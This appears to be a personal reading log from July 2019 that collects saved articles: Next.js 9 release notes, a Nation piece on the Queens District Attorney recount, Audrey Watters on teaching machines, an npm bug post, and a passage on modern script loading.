path-to-regexp (the library that powers Express). Creating a page that matches the route /post/:pid can now be achieved by creating a file in your pages directory named: pages/post/[pid].js! Next.js will automatically match requests like /post/1, /post/hello-nextjs, etc and render the page defined in pages/post/[pid].js. The matching URL segment will be passed as a query parameter to your page with the name specified between the [square-brackets]. For example: given the following page and the request /post/hello-nextjs, the query object will be { pid: 'hello-nextjs' }: static async getInitialProps({ query }) { // pid = 'hello-nextjs' const { pid } = query const postContent = await fetch( `https://api.example.com/post/${encodeURIComponent(pid)}` ).then(r => r.text()) return { postContent } } Multiple dynamic URL segments are also supported! The [param] syntax is supported for directory names and file names, meaning the following examples work: ./pages/blog/[blogId]/comments/[commentId].js ./pages/posts/[pid]/index.js You can read more about this feature in the Next.js Documentation or Next.js Learn section. Next.js added support for static website generation in v3, released approximately two years ago. At the time, this was the most requested feature to be added to Next.js. And for good reason: there's no denying that static websites are fast! They require no server-side computation and can be instantly streamed to the end-user from CDN locations. However, the choice between a server-side rendered or statically generated application was binary, you either choose for server-side rendering or for static generation. There was no middle ground. In reality applications can have different requirements. These requirements require different rendering strategies and trade-offs. For example, a homepage and marketing pages typically contain static content and are great candidates for static optimization. On the other hand, a product dashboard may benefit from being server-side rendering where the data frequently updates. We started exploring how we could give users the best of both worlds and be fast by default. How could we give users static marketing pages and dynamic server-rendered pages? Beginning with Next.js 9, users no longer have to make the choice between fully server-rendering or statically exporting their application. Giving you the best of both worlds on a per-page basis. A heuristic was introduced to automatically determine if a page can be prerendered to static HTML. This determination is made by whether or not the page has blocking data requirements through using getInitialProps. This heuristic allows Next.js to emit hybrid applications that contain both server-rendered and statically generated pages. The built-in Next.js server (next start) and programmatic API (app.getRequestHandler()) both support this build output transparently. There is no configuration or special handling required. Statically generated pages are still reactive: Next.js will hydrate your application client-side to give it full interactivity. Furthermore, Next.js will update your application after hydration if the page relies on query parameters in the URL. Next.js will visually inform you if a page will be statically generated during development. This visual artifact can be hidden by clicking it. Statically generated pages will also be displayed in Next.js' build output: In many cases when building React applications you end up needing some kind of backend. Either to retrieve data from a database or to process data provided by your users (e.g. a contact form). We found that many users who needed a backend built their API using a custom server. In doing so, they ran into quite a few issues. For example, Next.js does not compile custom server code, meaning that you couldn't use import / export or TypeScript. For this reason, many users ended up implementing their own custom compilation pipeline on top of the custom server. While this solved their goal, it is prone to many pitfalls: for example, when configured incorrectly tree shaking would be disabled for their entire application. This raised the question: what if we bring the developer experience Next.js provides to building API backends? Today we’re excited to introduce API routes, the best-in-class developer experience from Next.js for building your backend. To start using API routes you create a directory called api/ inside the pages/ directory. Any file in this directory will be automatically mapped to /api/<your route>, in the same way that other page files are mapped to routes. For example, pages/api/contact.js will be mapped to /api/contact. Note: API Routes also support Dynamic Routes! All the files inside the pages/api/ directory export a request handler function instead of a React Component: export default function handle(req, res) { res.end('Hello World') } Generally API endpoints take in some incoming data, for example the querystring, request body, or cookies and respond with other data. When investigating adding API routes support to Next.js we noticed that in many cases users didn’t use the Node.js request and response objects directly. Instead, they used an abstraction provided by server libraries like Express. The reason for doing this is that in many cases the incoming data is some form of text that has to be parsed first to be useful. So these specific server libraries help remove the burden of manually parsing the data, most commonly through middlewares. The most commonly used ones provide querystring, body, and cookies parsing, however they still require some setup to get started. API routes in Next.js will provide these middlewares by default so that you can be productive creating API endpoints immediately: export default function handle(req, res) { console.log(req.body) // The request body console.log(req.query) // The url querystring console.log(req.cookies) // The passed cookies res.end('Hello World') } Besides using incoming data your API endpoint generally also returns data. Commonly this response will be JSON. Next.js provides res.json() by default to make sending data easier: export default function handle(req, res) { res.json({ title: 'Hello World' }) } When making changes to API endpoints in development the code is automatically reloaded, so there is no need to restart the server. Next.js 9 will automatically prefetch <Link> components as they appear in-viewport. This feature improves the responsiveness of your application by making navigations to new pages quicker. Next.js uses an Intersection Observer to prefetch the assets necessary in the background. These requests have low-priority and yield to fetch() or XHR requests. Next.js will avoid automatically prefetching if the user has data-saver enabled. You can opt-out of this feature for rarely visited pages by setting the prefetch property to false: <Link href="/terms" prefetch={false}> <a>Terms of Service</a> </Link> Next.js 9 now renders optimized AMP by default for AMP-first and hybrid AMP pages. While AMP pages are opt-in, Next.js will automatically optimize their output. These optimizations can result in up to 50% faster rendering speed! This change was made possible by Sebastian Benz's incredible work on the AMP Optimizer. Next.js 9 replaces typeof window with its appropriate value (undefined or object) during server and client builds. This change allows Next.js to remove dead code from your production built application automatically. Users should see their client-side bundle sizes decrease if they have server-only code in getInitialProps or other parts of their application. In versions before 9, the only way to know that hot code replacement was going to happen (and that the Next.js compiler toolchain is doing work) is to look at the developer console. However many times one is looking at the resulting rendering instead, making it hard to know if Next.js is still doing compilation work or not. For example you might be making changes to styles on the page that are subtle and you wouldn't immediately know if they were updated. For this reason we created a RFC / "good first issue" to discuss potential solutions for the problem of indicating that work is being done. We received feedback from many designers and engineers on the RFC, for example what they prefer and potential directions for the design of the indicator. Rafael Almeida took this opportunity to collaborate with our team and implement a brand new indicator that is now available by default in Next.js 9. Whenever Next.js is doing compilation work you will see a small triangle show up in the bottom right corner of the page! Traditionally when making changes in development Next.js would show a compiling indicator state with loading state bars filling up and would continuously clear the screen as you made changes. This behavior causes some issues. Most notably it would clear console output from both your application code, for example when you add console.log to your components. But also when using external tools that stitch log output together like the Now CLI or docker-compose. Starting from Next.js 9 the log output jumps less and no longer clears the screen. The allows for a better overall experience as your terminal window will have more relevant information and flicker less while Next.js will integrate better with tools that you might already be using. Special thanks to Justin Chase for collaborating on output clearing. Building your application for production using next build it will now give you a detailed view of all pages that were built. Every page receives a few statistics automatically. The most prominent one is bundle size. As your application grows your JavaScript bundles will also grow, this build-time indication will help you indicate growth of your production bundles. In the future you will also be able to set performance budgets for pages that will fail the production build. Besides bundle sizes we also show how many project components and node_modules components are being used in every page. This gives an indication of the page complexity. Every page also has an indication of if it's statically optimized or server-side rendered, as every page can behave differently. Every page can now export a configuration object. Initially this configuration allows you to opt-into AMP, but in the future you will be able to configure more page specific options. // pages/about.js export const config = { amp: true } export default function AboutPage(props) { return <h3>My AMP About Page!</h3> } To opt into hybrid AMP rendering you can use the value 'hybrid': // pages/about.js import { useAmp } from 'next/amp' export const config = { amp: 'hybrid' } export default function AboutPage(props) { const isAmp = useAmp() return <h3>My About Page!{isAmp ? <> Powered by AMP!</> : ''}</h3> } The withAmp higher order component was removed in favor of this new configuration. We've provided a codemod that automatically converts usage of withAmp to the new configuration object. You can read more about this in the upgrade guide. We've recently made some changes to our tooling to provide a better experience while contributing to the codebase and ensure stability as the codebase grows. As you've read under the TypeScript section the Next.js core is now written in TypeScript and types are automatically generated for Next.js applications to use. Besides this being useful for applications built using Next.js, it's also useful when working on the core codebase. As you get type errors and autocompletion automatically. Next.js already had quite a large integration test suite that consists of 50+ Next.js applications with tests that run against them. These tests ensure that when a new version is released upgrading is smooth as the features that were available before were tested against the same test suite. Most of our tests are integration tests because in many cases they replicate "real" developers using Next.js in development. For example we have tests that replicate making changes to a Next.js application to see if hot module replacement works. Our integration tests are mostly based on Selenium webdriver, which we combined with chromedriver to test in headless Chrome. However as time passed certain issues would arise in other browsers, especially older browsers like Internet Explorer 11. Because we used Selenium we were able to run our tests automatically on multiple browsers. As of right now we are running our test suite on Chrome, Firefox, Safari and Internet Explorer 11. The Google Chrome team has been working on improving Next.js by contributing RFCs and pull-requests. The goal of this collaboration is large-scale performance improvements, focused on bundle sizes, bootup and hydration time. For example these changes will improve the experience of small websites, but also that of massive applications like Hulu, Twitch, and Deliveroo. The first area of focus is shipping modern JavaScript to browsers that support modern JavaScript. For example currently Next.js has to provide polyfills for async/await syntax as code might be executed in browsers that do not support async/await which would break. To avoid breaking older browsers while still sending modern JavaScript to browsers that support it Next.js will utilize the module/nomodule pattern. The module/nomodule pattern provides a reliable mechanism for serving modern JavaScript to modern browsers while still allowing older browsers to fall back to polyfilled ES5. The RFC for module/nomodule in Next.js can be found here. The current bundle splitting strategy in Next.js is based around a ratio-based heuristic for including modules in a single "commons" chunk. Because there is very little granularity as there is only one bundle, code is either downloaded unnecessarily (because the commons chunk could include code that's not actually required for a particular route) or the code is duplicated across multiple page bundles. The RFC for improved bundle splitting can be found here. The Chrome team is also working on many other optimizations and changes that will improve Next.js. RFCs for these will be shared soon. These RFCs and pull-requests are labeled "Collaboration" so that they can be easily found in the Next.js issue tracker. We're excited to see the continued growth of the Next.js community. This release had over 65 pull-request authors contributing core improvements or examples. Talking about examples, we now provide over 200 examples on how to integrate Next.js with different libraries and technologies! Including most css-in-js and data-fetching libraries. The Next.js community on spectrum.chat/next-js has doubled since the last major release with over 8,600 members. Join us! We are thankful to our community and all the external feedback and contributions that helped shape this release. Source: Blog – Next.js 9 | Next.js

    Read at 02:49 pm, Jul 11th

  • The Truth About the Queens DA Recount | The Nation

    The Truth About the Queens DA Recount The Truth About the Queens DA Recount While leftists in Queens have come very far in a year, they still haven’t seized every rein of power. Facebook Twitter Email Print Tiffany Caban, right, listens as Melinda Katz speaks during a Queens District Attorney candidates' forum. (AP Photo / Mary Altaffer, File) On Tuesday afternoon, a newly emboldened Gregory Meeks stood outside the Queens Board of Elections, a coterie of politicians, activists and hangers-on flanking him. He was there to rail against Tiffany Cabán’s campaign, to accuse her backers of trafficking in Trumpian falsehoods. Ad Policy “I personally feel like a lot of the people making that noise, they don’t come from Queens — these folks do,” Meeks said, gesturing to the crowd behind him. Much is on the line for Meeks, a veteran congressman and recently anointed leader of the Queens Democratic Party, the same organization once dominated by Joe Crowley, Alexandria Ocasio-Cortez’s original nemesis. On June 25th, Cabán, a leftist insurgent who was virtually unknown just a few months ago, appeared to be on the verge of defeating Meeks’ pick to lead the Queens District Attorney’s office, Melinda Katz. Home to one of the largest DA’s offices in the nation, Queens had been the focus of unusual national attention since Ocasio-Cortez, Bernie Sanders, and Elizabeth Warren all backed Cabán, a 31-year-old public defender running on a platform to radically reshape criminal justice in New York City. She declared victory, up by more than 1,000 votes with about 91,000 cast. Katz, the Queens borough president and unquestioned front-runner, refused to concede, waiting for the so-called paper ballots—affidavits and absentee ballots—to be tallied a week later. None of this was out of the ordinary: candidates leading by such a margin usually declare victory, while those trailing by less than 1 percent will wait before issuing a formal concession. DSA on the rise What happened next was remarkable. Katz crushed Cabán among absentee voters to the point where she now leads by 16 votes. Among veteran watchers of New York politics, the disappearance of the deficit was startling, because the results from the absentee pool rarely differ so dramatically from those that vote on Election Day. In the seven-way contest (one candidate dropped out before election day but remained on the ballot), Katz won about 56 percent of absentees, compared to Cabán’s paltry 22 percent. Rather than indicating some sort of Queens machine chicanery, that outcome suggested Katz, a veteran of many campaigns, targeted the sort of voters—senior citizens in particular—who regularly vote without going to the polls. With the margin so close, an automatic recount has been triggered. It will begin next week. (Katz, oddly enough, has declared victory, even though the slim margin requires a recount.) No recount on this scale in New York City has ever been attempted. It is expected to take several weeks, as teams at the Queens Board of Elections—both registered Democrats and Republicans, all with ties to the local political parties—manually count the votes from the paper ballots that are cast into machines. Votes that the machine didn’t read because the bubble wasn’t filled in properly could still be counted because poll workers will scrutinize the intention of the voter: if they used a checkmark, an X, or didn’t bubble in dark enough. The recount is open to the public and will be observed by attorneys from both campaigns. The Katz and Cabán campaigns each have arguments for why the recount will favor them. “It’s a coin toss,” said Benjamin Rosenblatt, the president of Tidal Wave Strategies, a Queens-based consulting firm that has extensively analyzed the results of the DA’s race. “Usually, people who don’t fill out ballots correctly, sometimes they can be older voters. On the other hand, they could be first time voters, younger voters, people who never filled out a ballot before.” '; inline_cta_font_color_318474 = '#000000'; inline_cta_button_text_318474 = ''; inline_cta_url_318474 = 'https://www.thenation.com/donate-website/?sourceid=1020084'; inline_cta_bg_color_318474 = '#ffcf0d'; }else{ inline_cta_text_318474 = ' Support Progressive Journalism If you like this article, please give today to help fund The Nation’s work. '; inline_cta_font_color_318474 = '#000000'; inline_cta_button_text_318474 = ''; inline_cta_url_318474 = 'https://www.thenation.com/donate-website/?sourceid=1020084'; inline_cta_bg_color_318474 = '#ffcf0d'; } if( inline_cta_text_318474 !='' ){ jQuery("#inline_cta_318474").html(inline_cta_text_318474); cta_1_check_318474 = true; } if( inline_cta_button_text_318474 !='' ){ jQuery("#inline_cta_btn_318474").html(inline_cta_button_text_318474); cta_1_check_318474 = true; } if( inline_cta_url_318474 !='' ){ jQuery("#inline_cta_btn_318474 a").attr("href",inline_cta_url_318474); cta_1_check_318474 = true; } if( inline_cta_bg_color_318474 !='' ){ jQuery("#inline_cta_btn_318474 a input").css("background",inline_cta_bg_color_318474); cta_1_check_318474 = true; } if( inline_cta_font_color_318474 !='' ){ jQuery("#inline_cta_btn_318474 a input").css("color",inline_cta_font_color_318474); cta_1_check_318474 = true; } if( cta_1_check_318474 ){ jQuery("#inline_cta_1_module_318474").addClass("tn-inline-cta-module"); } Due to New York’s archaic election laws, voters regularly show up at the polls unsure whether they are eligible to cast a ballot. Affidavits or provisional ballots are then assigned. The BOE typically ends up throwing many of these out, because the voters, for a variety of reasons, are not eligible for that particular election, whether it’s because they missed a deadline, joined the wrong party, or registered elsewhere. At question now are 114 affidavits from registered Democrats in Queens who, for a number of reasons, may have filled out provisional ballots incorrectly. The Cabán campaign has fought hard for all these votes to be counted, citing case law that several election lawyers unaffiliated with the campaigns believe could hold in court. Their motive is also self-interested: affidavit voters, newer to elections or newer to the borough, could be Cabán voters. Q&A With Tiffany Caban There is also relevant legislation that passed the State Assembly and Senate this year that would soften the standard for election officials to accept affidavit ballots. Carl Heastie, the Assembly speaker and a Katz supporter, has yet to send the bill to Governor Cuomo’s desk to sign into law. “Melinda Katz said on election night that every vote should be counted,” said Daniel Lumer, a Cabán spokesman. “We hope her campaign will join us in court to make sure that happens – and join our call on Governor Cuomo to quickly sign already-passed legislation that could prevent otherwise valid votes from being thrown out by technicalities.” “I believe the votes should count,” added Ali Najmi, a Democratic election lawyer unaffiliated with either campaign. “The poll worker has a duty to make sure voters are assisted in filling out affidavits correctly.” A hearing on the affidavits was scheduled for Tuesday in front of a Queens State Supreme Court judge who, like virtually judges in the Queens civil division, was elevated with the explicit blessing of the Queens Democratic Party boss. The case was adjourned, however, and will now be heard by a Brooklyn Republican judge at a later date, once the recount is complete. Recounts can be extraordinarily expensive and both the Katz and Cabán campaigns are running low on cash. In addition to a lawyer from the Democratic Socialists of America, a key early supporter, Cabán hired Jerry Goldfeder, a longtime Democratic election lawyer not known for working with hard left candidates. The campaign has also added BerlinRosen, the powerhouse PR and consulting firm known for working with the very real estate developers Cabán and her allies repeatedly denounced. Katz doesn’t need to pay a lawyer. As the chosen candidate of the Queens Democratic Party, Katz has an attorney, Frank Bolz, who works free of charge. Bolz is part of a trio of Long Island-based lawyers—all allies of Crowley and his predecessor—who have effectively controlled the Queens County legal system for more than 30 years. This reality has fed grievances both legitimate and farcical. After affidavits were tossed, Shaun King, the criminal justice advocate and prominent social media personality, tweeted “LIES” and accused the BOE, without any actual evidence, of stealing the election for Katz. State Senator Alessandra Biaggi, a Bronx Democrat, appeared to accuse Katz and the local Democrats of also stealing the election. '; inline_cta_2_font_color_318474 = '#ffffff'; inline_cta_2_button_text_318474 = ''; inline_cta_2_url_318474 = 'https://ssl.drgnetwork.com/ecom/NAT/app/live/subscriptions?org=NAT&publ=NA&key_code=68F1CGS&type=S'; inline_cta_2_bg_color_318474 = '#cc0e0e'; }else{ inline_cta_2_text_318474 = ' Subscribe to The Nation  for $2 a month. Get unlimited digital access to the best independent news and analysis. '; inline_cta_2_font_color_318474 = '#ffffff'; inline_cta_2_button_text_318474 = ''; inline_cta_2_url_318474 = 'https://ssl.drgnetwork.com/ecom/NAT/app/live/subscriptions?org=NAT&publ=NA&key_code=G8F1CTA&type=S'; inline_cta_2_bg_color_318474 = '#cc0e0e'; } if( inline_cta_2_text_318474 !='' ){ jQuery("#inline_cta_2_318474").html(inline_cta_2_text_318474); cta_2_check_318474 = true; } if( inline_cta_2_button_text_318474 !='' ){ jQuery("#inline_cta_2_btn_318474").html(inline_cta_2_button_text_318474); cta_2_check_318474 = true; } if( inline_cta_2_url_318474 !='' ){ jQuery("#inline_cta_2_btn_318474 a").attr("href",inline_cta_2_url_318474); cta_2_check_318474 = true; } if( inline_cta_2_bg_color_318474 !='' ){ jQuery("#inline_cta_2_btn_318474 a input").css("background",inline_cta_2_bg_color_318474); cta_2_check_318474 = true; } if( inline_cta_2_font_color_318474 !='' ){ jQuery("#inline_cta_2_btn_318474 a input").css("color",inline_cta_2_font_color_318474); cta_2_check_318474 = true; } if( cta_2_check_318474 ){ jQuery("#inline_cta_2_module_318474").addClass("tn-inline-cta-module"); } Nothing, so far, suggests any of this is true. Affidavit ballots are often discounted. The absentees weren’t forged. Democratic employees of the BOE, who do in fact owe their employment to party officials, have so far performed their jobs adequately. The recount commences without any foul play. These accusations have drawn a well of outrage from the Katz campaign. “The Cabán campaign’s persistent efforts to portray a rigged electoral system have triggered an avalanche of conspiracy theories and created a mob mentality,” said Matthew Rey, Katz’s campaign adviser. “The increasing recklessness of the Cabán campaign is deeply troubling for a candidate running for the borough’s top law enforcement job.” Criminal justice reform At the same time, the past incompetence of the city BOE—purging voters in Brooklyn, mismanaging machines—has bred understandable skepticism of the process. There are reasons to question the agency’s administering of elections. A nonpartisan BOE would assuage a lot of these concerns, but that won’t happen without action from Cuomo and the state legislature. Progressives rightfully skeptical of the Queens Democratic apparatus should also understand what they can and can’t do. The machine isn’t what it used to be—Katz turned out her votes through the help of organized labor and her own community ties, not the political clubs of yore. Political bosses can’t fix elections. Instead, they pick judges, stuff the BOE with allies, and allow friends to get rich in Surrogate’s Court. All of this matters tremendously. All of it creates appearances of impropriety. But it’s not the same as rigging a recount. Bolz, the aforementioned pro bono lawyer for Katz, is a reminder that while leftists in Queens have come very far in a year, they still haven’t seized every rein of power. Crowley’s defeat did not dislodge Bolz and his allies. Ocasio-Cortez, while taking on numerous national fights, has not attempted party-build back home. Those who propelled Cabán and Ocasio-Cortez have much to celebrate. Politics in New York is in the midst of a profound realignment. Meanwhile, the ailing machine chugs on. Source: The Truth About the Queens DA Recount | The Nation

    Read at 01:31 pm, Jul 11th

  • Lingering Questions

    Lingering Questions Audrey Watters on 06 Jul 2019 , tagged on , read As I turn to editing, I do still have a few lingering research questions – questions that I figured I’d post here so I can have them top-of-mind while editing (and, of course, in case anyone out there can help me): What happened to the Center for Programed Instruction? When and why did it close? Why did Norman Crowder start working on programmed instruction? And what role did his employer, U.S. Industries, play in making sure his “alternative” to Skinner’s instructional technology was given such prominence in the media? What are the connections between cybernetics and teaching machines? Is there a good corporate or military case study with the use of teaching machines – one well-documented in archival materials? Say, Hughes Aircraft? (And how does this connect to the rest of the story I'm telling?) Are there letters (or other primary sources) that address the use of programmed instruction in Freedom Summer? (And if so, do I have time to take another research trip?) Audrey Watters Published 06 Jul 2019 Source: Lingering Questions

    Read at 08:16 am, Jul 11th

  • The Teaching Machine Imaginary (And an Update on the Book)

    The Teaching Machine Imaginary (And an Update on the Book) Audrey Watters on 05 Jul 2019 , tagged on , read Cross-posted to the Teaching Machines website I submitted the draft of Teaching Machines to my editor at MIT Press at the end of May. I haven’t looked at the manuscript since, although I’ve been mulling over various parts and passages in my head almost nonstop. Over the course of the past few weeks, I’ve read a handful of books on writing and editing – Benjamin Dreyer’s Dreyer’s English, Stephen King’s On Writing, and Susan Bell’s The Artful Edit – but this week I turn my attention to revising the book. I’ve printed out all the pages and I’ll start making edits by hand – my preferred method. (It’s my preferred method of writing too but I do recognize that it is very, very slow. And so I type.) One of the realizations I’ve had recently, having chatted casually with various non-ed-tech professionals about the book – my eye doctor, for example, and my hair stylist – is that I need to have much richer descriptions of what the teaching machines actually look like and what they actually do. (Yes, yes, yes. This is obvious.) My elevator pitch for the book typically goes something like this: “It’s the story of the psychologists who, in the mid-twentieth century, built machines – not computers, before computers – that they claimed would automate and personalize education.” That verb “claimed” makes it sound like this was a promise unfulfilled. And to a certain extent, that’s true. Teaching machines never sat on every desk in every classroom in America. But their proponents would insist that, when and where these devices were used – and they were used at home, at school, by the military, by manufacturers – that they did indeed enable people to learn at their own pace without the need for human instructors. There is a gulf between what folks say education technology can do, of course, and what it actually does – as much today as in the 1950s and 1960s. And there’s a gulf too between what folks hear education technology can do, based on all the slogans and marketing, and what they imagine that actually means. “When you say ‘teaching machines from the 1960s’,” one person recently told me, “I picture the robot teacher in The Jetsons.” (I’m never sure if The Jetsons are meant to reflect “the future” as much a nostalgia for an invented future past – I’m inclined to think it’s always been the latter, even when the show first aired. It is, in many ways, incredibly reactionary.) The Jetsons did appear on primetime television during the peak of the teaching machine craze, but Mrs. Brainmocker, Elroy’s robot teacher (who is, I must presume by her title, a married robot teacher), appeared in just one episode – the last one of its 1960s incarnation – and only quite briefly at that. In “Elroy’s Mob,” a scene at the Little Dipper School opens with Elroy talking through a math problem written on the blackboard. His answer is gibberish: “…And eight trillion to the third power times the nuclear hypotenuse equals the total sum of the trigonomic syndrome divided by the supersonic equation.” “Now one second while I check over your answer,” Mrs. Brainmocker responds, rapidly clicking on the panel of buttons on her chest. “Boink!” A slip of paper emerges from the top of her (its?) head. “Absolutely correct, Elroy,” she reads. “You really know your elementary arithmetic.” As she begins to gush about what a pleasure it is to teach students like him, she starts to stutter. “I’ve got a short in one of my transistors,” she apologizes to the class. Mrs. Brainmocker was, of course, more sophisticated than the teaching machines that were peddled to schools and to families at the time. These machines couldn’t talk. They couldn’t roll around the classroom and hand out report cards. Nevertheless, Mrs. Brainmocker’s teaching – her functionality as as a teaching machine, that is – is strikingly similar to the devices that were available to the public. Mrs. Brainmocker even looks a bit like Norman Crowder’s Autotutor, a machine released by U. S. Industries in 1960, which had a series of buttons on its front that the student would click on to input her answers and which dispensed a read-out from its top with her score. Teaching machines and robot teachers were part of the Sixties’ cultural imaginary. But that imaginary – certainly in the case of The Jetsons – was, upon close inspection, not always particularly radical or transformative. The students at Little Dipper Elementary still sit in desks in rows. The teacher still stands at the front of the class, disciplining students who aren’t paying attention. (In this episode, that’s school bully Kenny Countdown, who’s watching the one-millionth episode of The Flintstones on his TV watch.) There were other, more sweeping visions of the future of teaching machines in the late 1950s and early 1960s – Simon Ramo’s “A New Technique of Education,” for example, that featured pervasive surveillance, television-based instruction, and “push-button classes.” But it’s worth underscoring that often what gets touted excitedly as “the future of education” and what gets absorbed into the cultural imaginary about that future are very rarely all that different from the present. And once you look closely at the technologies in question and their associated practices in these futures, you’ll find that they’re very rarely that exciting. Digital worksheets and the like. Animated drill-and-kill. Proponents of teaching machines in the 1950s and 1960s were quite aware that some of the excitement for their inventions was bound up in the novelty. Students responded enthusiastically to the new devices – but would that last? (A familiar concern to this day.) In order to help write some prose about teaching machines, I recently bought one off of eBay – a Min/Max II manufactured by Teaching Machines Inc, along with a “programed” course on electricity. The Min/Max was larger than I’d imagined – even though I’d read pages and pages of descriptions of the machine and thought I knew what to expect: about 18 inches long and 10 inches across. It was bulky, but as it was made from plastic, not particularly heavy. Even so, I had a hard time using it on my lap and it took up a lot of space on my desk. The only mechanical part of the machine: dials on each side used to advance the paper-based programming materials with a roller mechanism similar to a typewriter’s. The lid lifts to insert those papers – a max of 100 sheets, the Min/Max cautions. The electricity course, for its part, contains 150 pieces of paper, printed on both sides, each side with about 5 “frames” of instructional content. I slid about half the papers into the machine, and spun the knob until the first few questions appeared in the clear plastic window at the top. The first few frames introduce the student to programmed instruction, explaining how to read the question, write the answer in the blank space given, then push the paper up until the answer can be checked. “The steps in this program are fixed so that you should be right most of the time,” the instructions explain. The course then gives a couple of sample questions that demonstrate. “If the answer to a question is a word to be filled in the blank, it is shown with a line like this ______. George Washington was the first ______ of the U.S.” The first electricity question: “All matter is made of molecules (say MAHL-e-kules). Wood is made of molecules. Water is made of ______.” (The answer: molecules.) The course moves painfully slowly from there. It isn’t until question 9 that we get to atoms, question 17 that we get to electrons. I was bored well before then. Even with the promise that I could “move at my own pace,” that pace was necessarily slowed by the drudgery of the small steps in each frame. And I still had 1436 frames to go. I want to be clear here: this drudgery isn’t simply a result of the teaching machine. It is tied to “programmed instruction,” to be sure. (That method of designing educational materials, and not the hardware, is one of the most important legacies of the teaching machine movement.) But it’s also simply (and sadly) part of the drudgery of schoolwork – drudgery that, as the children’s book Danny Dunn and the Homework Machine (1958) observed, was unlikely to be eliminated by computers. In fact, as Danny and his friends found out, students would just be expected to do more dull work more quickly. The challenge, I think, is to express to readers this drudgery not only in contrast to the fantasies of shiny and efficient teaching machines – stories about robot teachers or otherwise – but also as the same sort of drudgery that today’s ed-tech dictates. Calling it “personalized learning” doesn’t make today’s computer-based instruction any more exciting. I promise you. Audrey Watters Published 05 Jul 2019 Source: The Teaching Machine Imaginary (And an Update on the Book)

    Read at 08:02 am, Jul 11th

Day of Jul 10th, 2019

  • China Is Forcing Tourists to Install Text-Stealing Malware at its Border

    Foreigners crossing certain Chinese borders into the Xinjiang region, where authorities are conducting a massive campaign of surveillance and oppression against the local Muslim population, are being forced to install a piece of malware on their phones that gives all of their text messages as well a

    Read at 09:42 am, Jul 10th

  • Corbyn’s Labour: Socialism Through Parliament or Parliamentary Socialism?

    Watching the polls in the UK at the beginning of this year, you might have seen something truly remarkable: that Jeremy Corbyn, a self-described socialist, someone towards whom those same polls — or really, pollsters — had been exceedingly cool, would, in the event of a general election, be elec

    Read at 09:31 am, Jul 10th

  • The npm Blog — An Old Bug

    Recently, I happened across a weird line in read-package-tree while reading through the code to see where I might get started implementing Workspaces for the npm CLI. At the time, I was so deep in the flow of reading code and tracing flows through various parts of the system, it didn’t strike me how important it was. I just thought “oh, that’s obviously wrong” and fixed it without a second thought. When I tried to integrate my changes back to the mainline CLI with read-package-tree version 5.3.0, however, I realized what I’d found. It might not seem weird at first, so I’ll provide some context. The read-package-tree module reads the tree of packages in a node_modules folder. It doesn’t do dependency resolution, or figure out how that tree needs to be modified during an install or update, but it does provide the basic data structure that is subsequently modified within the npm CLI installer codebase. Most importantly, it loads Node objects with parent and children links on them. Node.js’s module loader has a subtle and important property to it, which makes a lot of npm’s magic possible, and has made it such a good choice over the years as a way to create CLI utilities. When a module in Node calls require('foo'), Node looks up through the node_modules hierarchy to find the foo module. However, importantly, when a package is symlinked into another location, the module resolution process runs based on the target location, not the link location. This is why, for example, you can have a symlink from /usr/local/bin/npm that points to /usr/local/lib/node_modules/npm/bin/npm-cli.js, but the program doesn’t have to be updated to carry all its dependencies along with it. This is how you can have multiple different versions of a dependency loaded in the same Node program at the same time, providing a release valve on the dependency constraint solver and thus avoiding dependency hell. So back to this weird line. In the context of that file, this bit of code is loading up the children of a given node. In order to match Node’s module resolution algorithm, that should be reading the target and then loading the children there, rather than treating the link as the parent. In the mindset of general code cleanup, I modified it without even really noticing and then mistakenly let it slip past into a completely unrelated commit. When I tried to integrate read-package-tree (with this change) into the npm CLI, a bunch of tests broke in really bizarre ways. That’s when it hit me what was going on, and a lot of strange CLI behavior over the years started to make a ton of sense. Like, how occasionally a manually symlinked module would result in its dependencies being stripped away or mutated in some way that seemed to make no sense. (I’m sure most people don’t do this, but as someone who is probably too comfortable with module systems, I often mess with my projects with reckless abandon.) Prior to npm v3, there was no deduplication by default, and installation happened in a very naive “run in parallel, fetch whatever is still needed at that level” kind of way. It was dumb, in a mostly good way, but the result was that occasionally you’d get 15 copies of something when 1 would do just fine. It also meant that a proper progress bar was impossible, since the installer had no way of knowing when it would be done. (Simple loop detection helped it know that eventually it would be done, but not when, exactly.) Over the years, npm has had a lot of bugfixes and logic added to work around the issues that this one subtle mistake caused. The result of all that fixing, however, means that fixing the bug breaks a lot of stuff that works just fine today. The good news is that npm v7 will have Workspaces, and (once the installer is completely refactored into @npmcli/arborist), it’ll be trivial to implement. Out of idle curiosity, I tracked down where this bug had snuck in, though I was pretty sure I already knew the answer. It dates back to the original inception of the read-package-tree module. It really should have been caught and fixed in db70482 but, well, it wasn’t. Spotted my past self red-handed, messing with me as usual, sneaking bugs into my code. If I ever catch that guy, he’ll have quite a few things to answer for. Source: The npm Blog — An Old Bug

    Read at 04:45 pm, Jul 10th

  • Modern Script Loading

    Modern Script Loading 09 July 2019 on Modules, Ecosystem Serving the right code to the right browsers can be tricky. Here are some options. Serving modern code to modern browsers can be great for performance. Your JavaScript bundles can contain more compact or optimized modern syntax, while still supporting older browsers. The tooling ecosystem has consolidated on using the module/nomodule pattern for declaratively loading modern VS legacy code, which provides browsers with both sources and lets them decide which to use: <script type="module" src="/modern.js"></script> <script nomodule src="/legacy.js"></script> Unfortunately, it's not quite that straightforward. The HTML-based approach shown above triggers over-fetching of scripts in Edge and Safari. What can we do? What can we do? We want to deliver two compile targets depending on the browser, but a couple older browsers don't quite support the nice clean syntax for doing so. First, there's the Safari Fix. Safari 10.1 supports JS Modules not the nomodule attribute on scripts, which causes it to execute both the modern and legacy code (yikes!). Thankfully, Sam found a way to use a non-standard beforeload event supported in Safari 10 & 11 to polyfill nomodule. Option 1: Load Dynamically We can circumvent these issues by implementing a tiny script loader, similar to how LoadCSS works. Instead of relying on browsers to implement both ES Modules and the nomodule attribute, we can attempt to execute a Module script as a "litmus test", then use the result of that test to choose whether to load modern or legacy code. <!-- use a module script to detect modern browsers: --> <script type=module> self.modern = true </script> <!-- now use that flag to load modern VS legacy code: --> <script> document.head.appendChild((function(s){ if (self.modern) { s.src = '/modern.js' s.type='module' } else { s.src = '/legacy.js' } })(document.createElement('script'))) </script> A standalone variant of this can be implemented by checking if the browser supports nomodule. This would mean browsers like Safari 10.1 are treated as legacy even though they support Modules, but that might be a good thing. Here's the code for that: <script> $loadjs("/modern.js","/legacy.js") function $loadjs(src,fallback,s) { s = document.createElement('script') if ('noModule' in s) s.type = 'module', s.src = src else s.src = fallback document.head.appendChild(s) } <script> What's the trade-off? preloading. The trouble with this solution is that, because it's completely dynamic, the browser won't be able to discover our JavaScript 